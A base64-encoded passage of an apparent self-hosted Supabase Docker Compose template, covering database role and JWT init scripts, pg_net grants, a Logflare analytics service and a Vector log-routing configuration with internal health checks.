IFRPIHN1cGFiYXNlX2Z1bmN0aW9uc19hZG1pbiwgcG9zdGdyZXMsIGFub24sIGF1dGhlbnRpY2F0ZWQsIHNlcnZpY2Vfcm9sZTtcbiAgRU5EIElGO1xuRU5EXG4kJDtcbi0tIEV2ZW50IHRyaWdnZXIgZm9yIHBnX25ldFxuQ1JFQVRFIE9SIFJFUExBQ0UgRlVOQ1RJT04gZXh0ZW5zaW9ucy5ncmFudF9wZ19uZXRfYWNjZXNzKClcblJFVFVSTlMgZXZlbnRfdHJpZ2dlclxuTEFOR1VBR0UgcGxwZ3NxbFxuQVMgJCRcbkJFR0lOXG4gIElGIEVYSVNUUyAoXG4gICAgU0VMRUNUIDFcbiAgICBGUk9NIHBnX2V2ZW50X3RyaWdnZXJfZGRsX2NvbW1hbmRzKCkgQVMgZXZcbiAgICBKT0lOIHBnX2V4dGVuc2lvbiBBUyBleHRcbiAgICBPTiBldi5vYmppZCA9IGV4dC5vaWRcbiAgICBXSEVSRSBleHQuZXh0bmFtZSA9ICdwZ19uZXQnXG4gIClcbiAgVEhFTlxuICAgIEdSQU5UIFVTQUdFIE9OIFNDSEVNQSBuZXQgVE8gc3VwYWJhc2VfZnVuY3Rpb25zX2FkbWluLCBwb3N0Z3JlcywgYW5vbiwgYXV0aGVudGljYXRlZCwgc2VydmljZV9yb2xlO1xuICAgIEFMVEVSIGZ1bmN0aW9uIG5ldC5odHRwX2dldCh1cmwgdGV4dCwgcGFyYW1zIGpzb25iLCBoZWFkZXJzIGpzb25iLCB0aW1lb3V0X21pbGxpc2Vjb25kcyBpbnRlZ2VyKSBTRUNVUklUWSBERUZJTkVSO1xuICAgIEFMVEVSIGZ1bmN0aW9uIG5ldC5odHRwX3Bvc3QodXJsIHRleHQsIGJvZHkganNvbmIsIHBhcmFtcyBqc29uYiwgaGVhZGVycyBqc29uYiwgdGltZW91dF9taWxsaXNlY29uZHMgaW50ZWdlcikgU0VDVVJJVFkgREVGSU5FUjtcbiAgICBBTFRFUiBmdW5jdGlvbiBuZXQuaHR0cF9nZXQodXJsIHRleHQsIHBhcmFtcyBqc29uYiwgaGVhZGVycyBqc29uYiwgdGltZW91dF9taWxsaXNlY29uZHMgaW50ZWdlcikgU0VUIHNlYXJjaF9wYXRoID0gbmV0O1xuICAgIEFMVEVSIGZ1bmN0aW9uIG5ldC5odHRwX3Bvc3QodXJsIHRleHQsIGJvZHkganNvbmIsIHBhcmFtcyBqc29uYiwgaGVhZGVycyBqc29uYiwgdGltZW91dF9taWxsaXNlY29uZHMgaW50ZWdlcikgU0VUIHNlYXJjaF9wYXRoID0gbmV0O1xuICAgIFJFVk9LRSBBTEwgT04gRlVOQ1RJT04gbmV0Lmh0dHBfZ2V0KHVybCB0ZXh0LCBwYXJhbXMganNvbmIsIGhlYWRlcnMganNvbmIsIHRpbWVvdXRfbWlsbGlzZWNvbmRzIGludGVnZXIpIEZST00gUFVCTElDO1xuICAgIFJFVk9LRSBBTEwgT04gRlVOQ1RJT04gbmV0Lmh0dHBfcG9zdCh1cmwgdGV4dCwgYm9keSBqc29uYiwgcGFyYW1zIGpzb25iLCBoZWFkZXJzIGpzb25iLCB0aW1lb3V0X21pbGxpc2Vjb25kcyBpbnRlZ2VyKSBGUk9NIFBVQkxJQztcbiAgICBHUkFOVCBFWEVDVVRFIE9OIEZVTkNUSU9OIG5ldC5odHRwX2dldCh1cmwgdGV4dCwgcGFyYW1zIGpzb25iLCBoZWFkZXJzIGpzb25iLCB0aW1lb3V0X21pbGxpc2Vjb25kcyBpbnRlZ2VyKSBUTyBzdXBhYmFzZV9mdW5jdGlvbnNfYWRtaW4sIHBvc3RncmVzLCBhbm9uLCBhdXRoZW50aWNhdGVkLCBzZXJ2aWNlX3JvbGU7XG4gICAgR1JBTlQgRVhFQ1VURSBPTiBGVU5DVElPTiBuZXQuaHR0cF9wb3N0KHVybCB0ZXh0LCBib2R5IGpzb25iLCBwYXJhbXMganNvbmIsIGhlYWRlcnMganNvbmIsIHRpbWVvdXRfbWlsbGlzZWNvbmRzIGludGVnZXIpIFRPIHN1cGFiYXNlX2Z1bmN0aW9uc19hZG1pbiwgcG9zdGdyZXMsIGFub24sIGF1dGhlbnRpY2F0ZWQsIHNlcnZpY2Vfcm9sZTtcbiAgRU5EIElGO1xuRU5EO1xuJCQ7XG5DT01NRU5UIE9OIEZVTkNUSU9OIGV4dGVuc2lvbnMuZ3JhbnRfcGdfbmV0X2FjY2VzcyBJUyAnR3JhbnRzIGFjY2VzcyB0byBwZ19uZXQnO1xuRE9cbiQkXG5CRUdJTlxuICBJRiBOT1QgRVhJU1RTIChcbiAgICBTRUxFQ1QgMVxuICAgIEZST00gcGdfZXZlbnRfdHJpZ2dlclxuICAgIFdIRVJFIGV2dG5hbWUgPSAnaXNzdWVfcGdfbmV0X2FjY2VzcydcbiAgKSBUSEVOXG4gICAgQ1JFQVRFIEVWRU5UIFRSSUdHRVIgaXNzdWVfcGdfbmV0X2FjY2VzcyBPTiBkZGxfY29tbWFuZF9lbmQgV0hFTiBUQUcgSU4gKCdDUkVBVEUgRVhURU5TSU9OJylcbiAgICBFWEVDVVRFIFBST0NFRFVSRSBleHRlbnNpb25zLmdyYW50X3BnX25ldF9hY2Nlc3MoKTtcbiAgRU5EIElGO1xuRU5EXG4kJDtcbklOU0VSVCBJTlRPIHN1cGFiYXNlX2Z1bmN0aW9ucy5taWdyYXRpb25zICh2ZXJzaW9uKSBWQUxVRVMgKCcyMDIxMDgwOTE4MzQyM191cGRhdGVfZ3JhbnRzJyk7XG5BTFRFUiBmdW5jdGlvbiBzdXBhYmFzZV9mdW5jdGlvbnMuaHR0cF9yZXF1ZXN0KCkgU0VDVVJJVFkgREVGSU5FUjtcbkFMVEVSIGZ1bmN0aW9uIHN1cGFiYXNlX2Z1bmN0aW9ucy5odHRwX3JlcXVlc3QoKSBTRVQgc2VhcmNoX3BhdGggPSBzdXBhYmFzZV9mdW5jdGlvbnM7XG5SRVZPS0UgQUxMIE9OIEZVTkNUSU9OIHN1cGFiYXNlX2Z1bmN0aW9ucy5odHRwX3JlcXVlc3QoKSBGUk9NIFBVQkxJQztcbkdSQU5UIEVYRUNVVEUgT04gRlVOQ1RJT04gc3VwYWJhc2VfZnVuY3Rpb25zLmh0dHBfcmVxdWVzdCgpIFRPIHBvc3RncmVzLCBhbm9uLCBhdXRoZW50aWNhdGVkLCBzZXJ2aWNlX3JvbGU7XG5DT01NSVQ7XG4iCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL3ZvbHVtZXMvZGIvcm9sZXMuc3FsCiAgICAgICAgdGFyZ2V0OiAvZG9ja2VyLWVudHJ5cG9pbnQtaW5pdGRiLmQvaW5pdC1zY3JpcHRzLzk5LXJvbGVzLnNxbAogICAgICAgIGNvbnRlbnQ6ICItLSBOT1RFOiBjaGFuZ2UgdG8geW91ciBvd24gcGFzc3dvcmRzIGZvciBwcm9kdWN0aW9uIGVudmlyb25tZW50c1xuIFxcc2V0IHBncGFzcyBgZWNobyBcIiRQT1NUR1JFU19QQVNTV09SRFwiYFxuXG4gQUxURVIgVVNFUiBhdXRoZW50aWNhdG9yIFdJVEggUEFTU1dPUkQgOidwZ3Bhc3MnO1xuIEFMVEVSIFVTRVIgcGdib3VuY2VyIFdJVEggUEFTU1dPUkQgOidwZ3Bhc3MnO1xuIEFMVEVSIFVTRVIgc3VwYWJhc2VfYXV0aF9hZG1pbiBXSVRIIFBBU1NXT1JEIDoncGdwYXNzJztcbiBBTFRFUiBVU0VSIHN1cGFiYXNlX2Z1bmN0aW9uc19hZG1pbiBXSVRIIFBBU1NXT1JEIDoncGdwYXNzJztcbiBBTFRFUiBVU0VSIHN1cGFiYXNlX3N0b3JhZ2VfYWRtaW4gV0lUSCBQQVNTV09SRCA6J3BncGFzcyc7XG4iCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL3ZvbHVtZXMvZGIvand0LnNxbAogICAgICAgIHRhcmdldDogL2RvY2tlci1lbnRyeXBvaW50LWluaXRkYi5kL2luaXQtc2NyaXB0cy85OS1qd3Quc3FsCiAgICAgICAgY29udGVudDogIlxcc2V0IGp3dF9zZWNyZXQgYGVjaG8gXCIkSldUX1NFQ1JFVFwiYFxuXFxzZXQgand0X2V4cCBgZWNobyBcIiRKV1RfRVhQXCJgXG5cXHNldCBkYl9uYW1lIGBlY2hvIFwiJHtQT1NUR1JFU19EQjotcG9zdGdyZXN9XCJgXG5cbkFMVEVSIERBVEFCQVNFIDpkYl9uYW1lIFNFVCBcImFwcC5zZXR0aW5ncy5qd3Rfc2VjcmV0XCIgVE8gOidqd3Rfc2VjcmV0JztcbkFMVEVSIERBVEFCQVNFIDpkYl9uYW1lIFNFVCBcImFwcC5zZXR0aW5ncy5qd3RfZXhwXCIgVE8gOidqd3RfZXhwJztcbiIKICAgICAgLQogICAgICAgIHR5cGU6IGJpbmQKICAgICAgICBzb3VyY2U6IC4vdm9sdW1lcy9kYi9sb2dzLnNxbAogICAgICAgIHRhcmdldDogL2RvY2tlci1lbnRyeXBvaW50LWluaXRkYi5kL21pZ3JhdGlvbnMvOTktbG9ncy5zcWwKICAgICAgICBjb250ZW50OiAiXFxzZXQgcGd1c2VyIGBlY2hvIFwic3VwYWJhc2VfYWRtaW5cImBcblxcYyBfc3VwYWJhc2VcbmNyZWF0ZSBzY2hlbWEgaWYgbm90IGV4aXN0cyBfYW5hbHl0aWNzO1xuYWx0ZXIgc2NoZW1hIF9hbmFseXRpY3Mgb3duZXIgdG8gOnBndXNlcjtcblxcYyBwb3N0Z3Jlc1xuIgogICAgICAtICdzdXBhYmFzZS1kYi1jb25maWc6L2V0Yy9wb3N0Z3Jlc3FsLWN1c3RvbScKICBzdXBhYmFzZS1hbmFseXRpY3M6CiAgICBpbWFnZTogJ3N1cGFiYXNlL2xvZ2ZsYXJlOjEuNC4wJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIGN1cmwKICAgICAgICAtICdodHRwOi8vMTI3LjAuMC4xOjQwMDAvaGVhbHRoJwogICAgICB0aW1lb3V0OiA1cwogICAgICBpbnRlcnZhbDogNXMKICAgICAgcmV0cmllczogMTAKICAgIGRlcGVuZHNfb246CiAgICAgIHN1cGFiYXNlLWRiOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBMT0dGTEFSRV9OT0RFX0hPU1Q9MTI3LjAuMC4xCiAgICAgIC0gREJfVVNFUk5BTUU9c3VwYWJhc2VfYWRtaW4KICAgICAgLSBEQl9EQVRBQkFTRT1fc3VwYWJhc2UKICAgICAgLSAnREJfSE9TVE5BTUU9JHtQT1NUR1JFU19IT1NUTkFNRTotc3VwYWJhc2UtZGJ9JwogICAgICAtICdEQl9QT1JUPSR7UE9TVEdSRVNfUE9SVDotNTQzMn0nCiAgICAgIC0gJ0RCX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU30nCiAgICAgIC0gREJfU0NIRU1BPV9hbmFseXRpY3MKICAgICAgLSAnTE9HRkxBUkVfQVBJX0tFWT0ke1NFUlZJQ0VfUEFTU1dPUkRfTE9HRkxBUkV9JwogICAgICAtIExPR0ZMQVJFX1NJTkdMRV9URU5BTlQ9dHJ1ZQogICAgICAtIExPR0ZMQVJFX1NJTkdMRV9URU5BTlRfTU9ERT10cnVlCiAgICAgIC0gTE9HRkxBUkVfU1VQQUJBU0VfTU9ERT10cnVlCiAgICAgIC0gTE9HRkxBUkVfTUlOX0NMVVNURVJfU0laRT0xCiAgICAgIC0gJ1BPU1RHUkVTX0JBQ0tFTkRfVVJMPXBvc3RncmVzcWw6Ly9zdXBhYmFzZV9hZG1pbjoke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9QCR7UE9TVEdSRVNfSE9TVE5BTUU6LXN1cGFiYXNlLWRifToke1BPU1RHUkVTX1BPUlQ6LTU0MzJ9L19zdXBhYmFzZScKICAgICAgLSBQT1NUR1JFU19CQUNLRU5EX1NDSEVNQT1fYW5hbHl0aWNzCiAgICAgIC0gTE9HRkxBUkVfRkVBVFVSRV9GTEFHX09WRVJSSURFPW11bHRpYmFja2VuZD10cnVlCiAgc3VwYWJhc2UtdmVjdG9yOgogICAgaW1hZ2U6ICd0aW1iZXJpby92ZWN0b3I6MC4yOC4xLWFscGluZScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSB3Z2V0CiAgICAgICAgLSAnLS1uby12ZXJib3NlJwogICAgICAgIC0gJy0tdHJpZXM9MScKICAgICAgICAtICctLXNwaWRlcicKICAgICAgICAtICdodHRwOi8vc3VwYWJhc2UtdmVjdG9yOjkwMDEvaGVhbHRoJwogICAgICB0aW1lb3V0OiA1cwogICAgICBpbnRlcnZhbDogNXMKICAgICAgcmV0cmllczogMwogICAgdm9sdW1lczoKICAgICAgLQogICAgICAgIHR5cGU6IGJpbmQKICAgICAgICBzb3VyY2U6IC4vdm9sdW1lcy9sb2dzL3ZlY3Rvci55bWwKICAgICAgICB0YXJnZXQ6IC9ldGMvdmVjdG9yL3ZlY3Rvci55bWwKICAgICAgICByZWFkX29ubHk6IHRydWUKICAgICAgICBjb250ZW50OiAiYXBpOlxuICBlbmFibGVkOiB0cnVlXG4gIGFkZHJlc3M6IDAuMC4wLjA6OTAwMVxuXG5zb3VyY2VzOlxuICBkb2NrZXJfaG9zdDpcbiAgICB0eXBlOiBkb2NrZXJfbG9nc1xuICAgIGV4Y2x1ZGVfY29udGFpbmVyczpcbiAgICAgIC0gc3VwYWJhc2UtdmVjdG9yXG5cbnRyYW5zZm9ybXM6XG4gIHByb2plY3RfbG9nczpcbiAgICB0eXBlOiByZW1hcFxuICAgIGlucHV0czpcbiAgICAgIC0gZG9ja2VyX2hvc3RcbiAgICBzb3VyY2U6IHwtXG4gICAgICAucHJvamVjdCA9IFwiZGVmYXVsdFwiXG4gICAgICAuZXZlbnRfbWVzc2FnZSA9IGRlbCgubWVzc2FnZSlcbiAgICAgIC5hcHBuYW1lID0gZGVsKC5jb250YWluZXJfbmFtZSlcbiAgICAgIGRlbCguY29udGFpbmVyX2NyZWF0ZWRfYXQpXG4gICAgICBkZWwoLmNvbnRhaW5lcl9pZClcbiAgICAgIGRlbCguc291cmNlX3R5cGUpXG4gICAgICBkZWwoLnN0cmVhbSlcbiAgICAgIGRlbCgubGFiZWwpXG4gICAgICBkZWwoLmltYWdlKVxuICAgICAgZGVsKC5ob3N0KVxuICAgICAgZGVsKC5zdHJlYW0pXG4gIHJvdXRlcjpcbiAgICB0eXBlOiByb3V0ZVxuICAgIGlucHV0czpcbiAgICAgIC0gcHJvamVjdF9sb2dzXG4gICAgcm91dGU6XG4gICAgICBrb25nOiAnc3RhcnRzX3dpdGgoc3RyaW5nISguYXBwbmFtZSksIFwic3VwYWJhc2Uta29uZ1wiKSdcbiAgICAgIGF1dGg6ICdzdGFydHNfd2l0aChzdHJpbmchKC5hcHBuYW1lKSwgXCJzdXBhYmFzZS1hdXRoXCIpJ1xuICAgICAgcmVzdDogJ3N0YXJ0c193aXRoKHN0cmluZyEoLmFwcG5hbWUpLCBcInN1cGFiYXNlLXJlc3RcIiknXG4gICAgICByZWFsdGltZTogJ3N0YXJ0c193aXRoKHN0cmluZyEoLmFwcG5hbWUpLCBcInJlYWx0aW1lLWRldlwiKSdcbiAgICAgIHN0b3JhZ2U6ICdzdGFydHNfd2l0aChzdHJpbmchKC5hcHBuYW1lKSwgXCJzdXBhYmFzZS1zdG9yYWdlXCIpJ1xuICAgICAgZnVuY3Rpb25zOiAnc3RhcnRzX3dpdGgoc3RyaW5nISguYXBwbmFtZSksIFwic3VwYWJhc2UtZnVuY3Rpb25zXCIpJ1xuICAgICAgZGI6ICdzdGFydHNfd2l0aChzdHJpbmchKC5hcHBuYW1lKSwgXCJzdXBhYmFzZS1kYlwiKSdcbiAgIyBJZ25vcmVzIG5vbiBuZ2lueCBlcnJvcnMgc2luY2UgdGhleSBhcmUgcmVsYXRlZCB3aXRoIGtvbmcgYm9vdGluZyB1cFxuICBrb25nX2xvZ3M6XG4gICAgdHlwZTogcmVtYXBcbiAgICBpbnB1dHM6XG4gICAgICAtIHJvdXRlci5rb25nXG4gICAgc291cmNlOiB8LVxuICAgICAgcmVxLCBlcnIgPSBwYXJzZV9uZ2lueF9sb2coLmV2ZW50X21lc3NhZ2UsIFwiY29tYmluZWRcIilcbiAgICAgIGlmIGVyciA9PSBudWxsIHtcbiAgICAgICAgICAudGltZXN0YW1wID0gcmVxLnRpbWVzdGFtcFxuICAgICAgICAgIC5tZXRhZGF0YS5yZXF1ZXN0LmhlYWRlcnMucmVmZXJlciA9IHJlcS5yZWZlcmVyXG4gICAgICAgICAgLm1ldGFkYXRhLnJlcXVlc3QuaGVhZGVycy51c2VyX2FnZW50ID0gcmVxLmFnZW50XG4gICAgICAgICAgLm1ldGFkYXRhLnJlcXVlc3QuaGVhZGVycy5jZl9jb25uZWN0aW5nX2lwID0gcmVxLmNsaWVudFxuICAgICAgICAgIC5tZXRhZGF0YS5yZXF1ZXN0Lm1ldGhvZCA9IHJlcS5tZXRob2RcbiAgICAgICAgICAubWV0YWRhdGEucmVxdWVzdC5wYXRoID0gcmVxLnBhdGhcbiAgICAgICAgICAubWV0YWRhdGEucmVxdWVzdC5wcm90b2NvbCA9IHJlcS5wcm90b2NvbFxuICAgICAgICAgIC5tZXRhZGF0YS5yZXNwb25zZS5zdGF0dXNfY29kZSA9IHJlcS5zdGF0dXNcbiAgICAgIH1cbiAgICAgIGlmIGVyciAhPSBudWxsIHtcbiAgICAgICAgYWJvcnRcbiAgICAgIH1cbiAgIyBJZ25vcmVzIG5vbiBuZ2lueCBlcnJvcnMgc2luY2UgdGhleSBhcmUgcmVsYXRlZCB3aXRoIGtvbmcgYm9vdGluZyB1cFxuICBrb25nX2VycjpcbiAgICB0eXBlOiByZW1hcFxuICAgIGlucHV0czpcbiAgICAgIC0gcm91dGVyLmtvbmdcbiAgICBzb3VyY2U6IHwtXG4gICAgICAubWV0YWRhdGEucmVxdWVzdC5tZXRob2QgPSBcIkdFVFwiXG4gICAgICAubWV0YWRhdGEucmVzcG9uc2Uuc3RhdHVzX2NvZGUgPSAyMDBcbiAgICAgIHBhcnNlZCwgZXJyID0gcGFyc2VfbmdpbnhfbG9nKC5ldmVudF9tZXNzYWdlLCBcImVycm9yXCIpXG4gICAgICBpZiBlcnIgPT0gbnVsbCB7XG4gICAgICAgICAgLnRpbWVzdGFtcCA9IHBhcnNlZC50aW1lc3RhbXBcbiAgICAgICAgICAuc2V2ZXJpdHkgPSBwYXJzZWQuc2V2ZXJpdHlcbiAgICAgICAgICAubWV0YWRhdGEucmVxdWVzdC5ob3N0ID0gcGFyc2VkLmhvc3RcbiAgICAgICAgICAubWV0YWRhdGEucmVxdWVzdC5oZWFkZXJzLmNmX2Nvbm5lY3RpbmdfaXAgPSBwYXJzZWQuY2xpZW50XG4gICAgICAgICAgdXJsLCBlcnIgPSBzcGxpdChwYXJzZWQucmVxdWVzdCwgXCIgXCIpXG4gICAgICAgICAgaWYgZXJyID09IG51bGwge1xuICAgICAgICAgICAgICAubWV0YWRhdGEucmVxdWVzdC5tZXRob2QgPSB1cmxbMF1cbiAgICAgICAgICAgICAgLm1ldGFkYXRhLnJlcXVlc3QucGF0aCA9IHVybFsxXVxuICAgICAgICAgICAgICAubWV0YWRhdGEucmVxdWVzdC5wcm90b2NvbCA9IHVybFsyXVxuICAgICAgICAgIH1cbiAgICAgIH1cbiAgICAgIGlmIGVyciAhPSBudWxsIHtcbiAgICAgICAgYWJvcnRcbiAgICAgIH1cbiAgIyBHb3RydWUgbG9ncyBhcmUgc3RydWN0dXJlZCBqc29uIHN0cmluZ3Mgd2hpY2ggZnJvbnRlbmQgcGFyc2VzIGRpcmVjdGx5LiBCdXQgd2Uga2VlcCBtZXRhZGF0YSBmb3IgY29uc2lzdGVuY3kuXG4gIGF1dGhfbG9nczpcbiAgICB0eXBlOiByZW1hcFxuICAgIGlucHV0czpcbiAgICAgIC0gcm91dGVyLmF1dGhcbiAgICBzb3VyY2U6IHwtXG4gICAgICBwYXJzZWQsIGVyciA9IHBhcnNlX2pzb24oLmV2ZW50X21lc3NhZ2UpXG4gICAgICBpZiBlcnIgPT0gbnVsbCB7XG4gICAgICAgICAgLm1ldGFkYXRhLnRpbWVzdGFtcCA9IHBhcnNlZC50aW1lXG4gICAgICAgICAgLm1ldGFkYXRhID0gbWVyZ2UhKC5tZXRhZGF0YSwgcGFyc2VkKVxuICAgICAgfVxuICAjIFBvc3RnUkVTVCBsb2dzIGFyZSBzdHJ1Y3R1cmVkIHNvIHdlIHNlcGFyYXRlIHRpbWVzdGFtcCBmcm9tIG1lc3NhZ2UgdXNpbmcgcmVnZXhcbiAgcmVzdF9sb2dzOlxuICAgIHR5cGU6IHJlbWFwXG4gICAgaW5wdXRzOlxuICAgICAgLSByb3V0ZXIucmVzdFxuICAgIHNvdXJjZTogfC1cbiAgICAgIHBhcnNlZCwgZXJyID0gcGFyc2VfcmVnZXgoLmV2ZW50X21lc3NhZ2UsIHInXig/UDx0aW1lPi4qKTogKD9QPG1zZz4uKikkJylcbiAgICAgIGlmIGVyciA9PSBudWxsIHtcbiAgICAgICAgICAuZXZlbnRfbWVzc2FnZSA9IHBhcnNlZC5tc2dcbiAgICAgICAgICAudGltZXN0YW1wID0gdG9fdGltZXN0YW1wIShwYXJzZWQudGltZSlcbiAgICAgICAgICAubWV0YWRhdGEuaG9zdCA9IC5wcm9qZWN0XG4gICAgICB9XG4gICMgUmVhbHRpbWUgbG9ncyBhcmUgc3RydWN0dXJlZCBzbyB3ZSBwYXJzZSB0aGUgc2V2ZXJpdHkgbGV2ZWwgdXNpbmcgcmVnZXggKGlnbm9yZSB0aW1lIGJlY2F1c2UgaXQgaGFzIG5vIGRhdGUpXG4gIHJlYWx0aW1lX2xvZ3M6XG4gICAgdHlwZTogcmVtYXBcbiAgICBpbnB1dHM6XG4gICAgICAtIHJvdXRlci5yZWFsdGltZVxuICAgIHNvdXJjZTogfC1cbiAgICAgIC5tZXRhZGF0YS5wcm9qZWN0ID0gZGVsKC5wcm9qZWN0KVxuICAgICAgLm1ldGFkYXRhLmV4dGVybmFsX2lkID0gLm1ldGFkYXRhLnByb2plY3RcbiAgICAgIHBhcnNlZCwgZXJyID0gcGFyc2VfcmVnZXgoLmV2ZW50X21lc3NhZ2UsIHInXig/UDx0aW1lPlxcZCs6XFxkKzpcXGQrXFwuXFxkKykgXFxbKD9QPGxldmVsPlxcdyspXFxdICg/UDxtc2c+LiopJCcpXG4gICAgICBpZiBlcnIgPT0gbnVsbCB7XG4gICAgICAgICAgLmV2ZW50X21lc3NhZ2UgPSBwYXJzZWQubXNnXG4gICAgICAgICAgLm1ldGFkYXRhLmxldmVsID0gcGFyc2VkLmxldmVsXG4gICAgICB9XG4gICMgU3RvcmFnZSBsb2dzIG1heSBjb250YWluIGpzb24gb2JqZWN0cyBzbyB3ZSBwYXJzZSB0aGVtIGZvciBjb21wbGV0ZW5lc3NcbiAgc3RvcmFnZV9sb2dzOlxuICAgIHR5cGU6IHJlbWFwXG4gICAgaW5wdXRzOlxuICAgICAgLSByb3V0ZXIuc3RvcmFnZVxuICAgIHNvdXJjZTogfC1cbiAgICAgIC5tZXRhZGF0YS5wcm9qZWN0ID0gZGVsKC5wcm9qZWN0KVxuICAgICAgLm1ldGFkYXRhLnRlbmFudElkID0gLm1ldGFkYXRhLnByb2plY3RcbiAgICAgIHBhcnNlZCwgZXJyID0gcGFyc2VfanNvbiguZXZlbnRfbWVzc2FnZSlcbiAgICAgIGlmIGVyciA9PSBudWxsIHtcbiAgICAgICAgICAuZXZlbnRfbWVzc2FnZSA9IHBhcnNlZC5tc2dcbiAgICAgICAgICAubWV0YWRhdGEubGV2ZWwgPSBwYXJzZWQubGV2ZWxcbiAgICAgICAgICAubWV0YWRhdGEudGltZXN0YW1wID0gcGFyc2VkLnRpbWVcbiAgICAgICAgICAubWV0YWRhdGEuY29udGV4dFswXS5ob3N0ID0gcGFyc2VkLmhvc3RuYW1lXG4gICAgICAgICAgLm1ldGFkYXRhLmNvbnRleHRbMF0ucGlkID0gcGFyc2VkLnBpZFxuICAgICAgfVxuICAjIFBvc3RncmVzIGxvZ3Mgc29tZSBtZXNzYWdlcyB0byBzdGRlcnIgd2hpY2ggd2UgbWFwIHRvIHdhcm5pbmcgc2V2ZXJpdHkgbGV2ZWxcbiAgZGJfbG9nczpcbiAgICB0eXBlOiByZW1hcFxuICAgIGlucHV0czpcbiAgICAgIC0gcm91dGVyLmRiXG4gICAgc291cmNlOiB8LVxuICAgICAgLm1ldGFkYXRhLmhvc3QgPSBcImRiLWRlZmF1bHRcIlxuICAgICAgLm1ldGFkYXRhLnBhcnNlZC50aW1lc3RhbXAgPSAudGltZXN0YW1wXG5cbiAgICAgIHBhcnNlZCwgZXJyID0gcGFyc2VfcmVnZXgoLmV2ZW50X21lc3NhZ2UsIHInLiooP1A8bGV2ZWw+SU5GT3xOT1RJQ0V8V0FSTklOR3xFUlJPUnxMT0d8RkFUQUx8UEFOSUM/KTouKicsIG51bWVyaWNfZ3JvdXBzOiB0cnVlKVxuXG4gICAgICBpZiBlcnIgIT0gbnVsbCB8fCBwYXJzZWQgPT0gbnVsbCB7XG4gICAgICAgIC5tZXRhZGF0YS5wYXJzZWQuZXJyb3Jfc2V2ZXJpdHkgPSBcImluZm9cIlxuICAgICAgfVxuICAgICAgaWYgcGFyc2VkICE9IG51bGwge1xuICAgICAgLm1ldGFkYXRhLnBhcnNlZC5lcnJvcl9zZXZlcml0eSA9IHBhcnNlZC5sZXZlbFxuICAgICAgfVxuICAgICAgaWYgLm1ldGFkYXRhLnBhcnNlZC5lcnJvcl9zZXZlcml0eSA9PSBcImluZm9cIiB7XG4gICAgICAgICAgLm1ldGFkYXRhLnBhcnNlZC5lcnJvcl9zZXZlcml0eSA9IFwibG9nXCJcbiAgICAgIH1cbiAgICAgIC5tZXRhZGF0YS5wYXJzZWQuZXJyb3Jfc2V2ZXJpdHkgPSB1cGNhc2UhKC5tZXRhZGF0YS5wYXJzZWQuZXJyb3Jfc2V2ZXJpdHkpXG5cbnNpbmtzOlxuICBsb2dmbGFyZV9hdXRoOlxuICAgIHR5cGU6ICdodHRwJ1xuICAgIGlucHV0czpcbiAgICAgIC0gYXV0aF9sb2dzXG4gICAgZW5jb2Rpbmc6XG4gICAgICBjb2RlYzogJ2pzb24nXG4gICAgbWV0aG9kOiAncG9zdCdcbiAgICByZXF1ZXN0OlxuICAgICAgcmV0cnlfbWF4X2R1cmF0aW9uX3NlY3M6IDEwXG4gICAgdXJpOiAnaHR0cDovL3N1cGFiYXNlLWFuYWx5dGljczo0MDAwL2FwaS9sb2dzP3NvdXJjZV9uYW1lPWdvdHJ1ZS5sb2dzLnByb2QmYXBpX2tleT0ke0xPR0ZMQVJFX0FQSV9LRVk/TE9HRkxBUkVfQVBJX0tFWSBpcyByZXF1aXJlZH0nXG4gIGxvZ2ZsYXJlX3JlYWx0aW1lOlxuICAgIHR5cGU6ICdodHRwJ1xuICAgIGlucHV0czpcbiAgICAgIC0gcmVhbHRpbWVfbG9nc1xuICAgIGVuY29kaW5nOlxuICAgICAgY29kZWM6ICdqc29uJ1xuICAgIG1ldGhvZDogJ3Bvc3QnXG4gICAgcmVxdWVzdDpcbiAgICAgIHJldHJ5X21heF9kdXJhdGlvbl9zZWNzOiAxMFxuICAgIHVyaTogJ2h0dHA6Ly9zdXBhYmFzZS1hbmFseXRpY3M6NDAwMC9hcGkvbG9ncz9zb3VyY2VfbmFtZT1yZWFsdGltZS5sb2dzLnByb2QmYXBpX2tleT0ke0xPR0ZMQVJFX0FQSV9LRVk/TE9HRkxBUkVfQVBJX0tFWSBpcyByZXF1aXJlZH0nXG4gIGxvZ2ZsYXJlX3Jlc3Q6XG4gICAgdHlwZTogJ2h0dHAnXG4gICAgaW5wdXRzOlxuICAgICAgLSByZXN0X2xvZ3NcbiAgICBlbmNvZGluZzpcbiAgICAgIGNvZGVjOiAnanNvbidcbiAgICBtZXRob2Q6ICdwb3N0J1xuICAgIHJlcXVlc3Q6XG4gICAgICByZXRyeV9tYXhfZHVyYXRpb25fc2VjczogMTBcbiAgICB1cmk6ICdodHRwOi8vc3VwYWJhc2UtYW5hbHl0aWNzOjQwMDAvYXBpL2xvZ3M/c291cmNlX25hbWU9cG9zdGdSRVNULmxvZ3MucHJvZCZhcGlfa2V5PSR7TE9HRkxBUkVfQVBJX0tFWT9MT0dGTEFSRV9BUElfS0VZIGlzIHJlcXVpcmVkfSdcbiAgbG9nZmxhcmVfZGI6XG4gICAgdHlwZTogJ2h0dHAnXG4gICAgaW5wdXRzOlxuICAgICAgLSBkYl9sb2dzXG4gICAgZW5jb2Rpbmc6XG4gICAgICBjb2RlYzogJ2pzb24nXG4gICAgbWV0aG9kOiAncG9zdCdcbiAgICByZXF1ZXN0OlxuICAgICAgcmV0cnlfbWF4X2R1cmF0aW9uX3NlY3M6IDEwXG4gICAgIyBXZSBtdXN0IHJvdXRlIHRoZSBzaW5rIHRocm91Z2gga29uZyBiZWNhdXNlIGluZ2VzdGluZyBsb2dzIGJlZm9yZSBsb2dmbGFyZSBpcyBmdWxseSBpbml0aWFsaXNlZCB3aWxsXG4gICAgIyBsZWFkIHRvIGJyb2tlbiBxdWVyaWVzIGZyb20gc3R1ZGlvLiBUaGlzIH